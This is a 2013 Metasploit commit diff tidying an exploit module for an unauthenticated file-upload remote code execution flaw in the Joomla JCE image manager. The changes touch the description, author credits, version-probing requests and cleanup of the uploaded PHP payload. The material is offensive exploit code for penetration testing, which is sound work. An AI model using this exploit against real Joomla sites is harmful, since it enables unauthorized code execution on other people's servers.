cleanup for joomla_comjce_imgmanager

jvazquez-r7 · jvazquez-r7 · commit 1d95abc4581f · 2013-03-26T12:02:39.000+01:00
diff --git a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb
@@ -15,32 +15,33 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Joomla Component JCE File Upload Code Execution',
+			'Name'           => 'Joomla Component JCE File Upload Remote Code Execution',
 			'Description'    => %q{
-					This module exploits a vulnerability  in the JCE component for Joomla!
-			could allow a  unauthenticated remote attacker to upload arbitrary files,
-			caused by the fails to  sufficiently sanitize user-supplied input.
-			Sending a specially-crafted HTTP request, a remote attacker could exploit
-			this vulnerability to upload a malicious PHP script, which could allow the
-			attacker to execute arbitrary PHP code on the vulnerable system.
+					This module exploits a vulnerability  in the JCE component for Joomla!, which
+			could allow an unauthenticated remote attacker to upload arbitrary files, caused by the
+			fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP
+			request, a remote attacker could exploit this vulnerability to upload a malicious PHP
+			script, which could allow the attacker to execute arbitrary PHP code on the vulnerable
+			system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla
+			1.5.26.
 			},
-			'Author'         => [ 'Heyder Andrade <eu[at]heyderandrade.org>' ],
+			'Author'         =>
+				[
+					'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
+					'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
+				],
 			'License'        => MSF_LICENSE,
 			'References'     =>
 				[
 					['BID', '49338'],
-					['EDB', '17734'],
+					['EDB', '17734']
 				],
 			'Payload'        =>
 				{
 					'Space'       => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
 					'DisableNops' => true,
 					'BadChars'    => "#",
-					'Keys'        => ['php'],
-					'Compat'      =>
-						{
-							'ConnectionType' => 'find',
-						},
+					'Keys'        => ['php']
 				},
 			'Platform'       => 'php',
 			'Arch'           => ARCH_PHP,
@@ -60,21 +61,20 @@ def get_version
 		# check imgmanager version
 		@uri_base 		= normalize_uri(target_uri.path.to_s, 'index.php')
 		@vars_get_base 	=  	{
-								'option'=> 'com_jce',
-								'task'  => 'plugin',
-								'plugin'=> 'imgmanager',
-								'file'  => 'imgmanager'
-							}
+			'option'=> 'com_jce',
+			'task'  => 'plugin',
+			'plugin'=> 'imgmanager',
+			'file'  => 'imgmanager'
+		}
 		print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
-		res = send_request_cgi(
-			{
-				'uri' 	  => @uri_base,
-				'vars_get' => @vars_get_base,
-				'method'  => 'GET',
-				'version' => '1.1'
-
-			})
+		res = send_request_cgi({
+			'uri' 	  => @uri_base,
+			'vars_get' => @vars_get_base,
+			'method'  => 'GET',
+			'version' => '1.1'
+		})
 
+		version = nil
 		if (res and res.code == 200)
 			res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
 			version = $1.nil? ? nil : $1
@@ -171,7 +171,6 @@ def call_payload
 		payload = "#{@payload_name}.php"
 		print_status("Calling payload: #{payload}")
 		uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
-		register_files_for_cleanup(payload)
 		res = send_request_cgi({
 			'uri'	=> uri,
 			'method'    => 'GET',
@@ -186,6 +185,7 @@ def exploit
 		return if not check == Exploit::CheckCode::Vulnerable
 		if upload_gif == :success
 			if renamed?
+				register_files_for_cleanup("#{@payload_name}.php")
 				call_payload
 			end
 		end
